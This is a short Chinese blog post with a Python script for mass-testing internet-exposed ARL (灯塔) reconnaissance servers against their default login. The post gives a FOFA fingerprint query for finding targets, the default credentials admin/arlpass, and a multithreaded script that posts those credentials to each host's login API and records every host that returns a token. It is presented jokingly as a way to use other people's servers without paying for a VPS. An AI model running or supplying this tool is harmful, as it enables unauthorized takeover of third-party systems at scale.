标题随便写，能看到都是有缘人

搭建灯塔那么繁琐的步骤，远不如爆破一个灯塔是吧(狗头)

而且还可能买不起VPS的情况(例如我)   那不如写一个脚本去爆破灯塔的弱口令

整治网络安全 从你我做起

fofa语法：     icon_hash="1708240621"

首先去百度下灯塔的默认账号密码

admin/arlpass

 默认密码有了，写脚本

import requests
import urllib3

from concurrent.futures import ThreadPoolExecutor
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)


with open('1.txt', 'r') as f:
    urls = [line.strip() for line in f]

data = {"username": "admin", "password": "arlpass"}

def send_request(url):
    url = url.replace("{1}", "").strip() + "/api/user/login"
    try:
        response = requests.post(url, json=data, timeout=5, verify=False)
        if "token" in response.text:
            with open('2.txt', 'a') as f:
                f.write(f'{url}' + '\n')
            print(f"{url}:  ==存在弱口令")
        else:
            print(f"{url}:  no")
    except requests.exceptions.Timeout:
        print(f"{url}: 超时")
    except requests.exceptions.RequestException as e:
        print(f"{url}: 无法访问：{e}")
    except ValueError as e:
        print(f"{url}: 异常：{e}")

# 线程
max_workers = 10

with ThreadPoolExecutor(max_workers=max_workers) as executor:
    futures = [executor.submit(send_request, url) for url in urls]

    for future in futures:
        future.result()

print("所有请求已完成！")

fofa语法：     icon_hash="1708240621"

 主打的就是一个批量。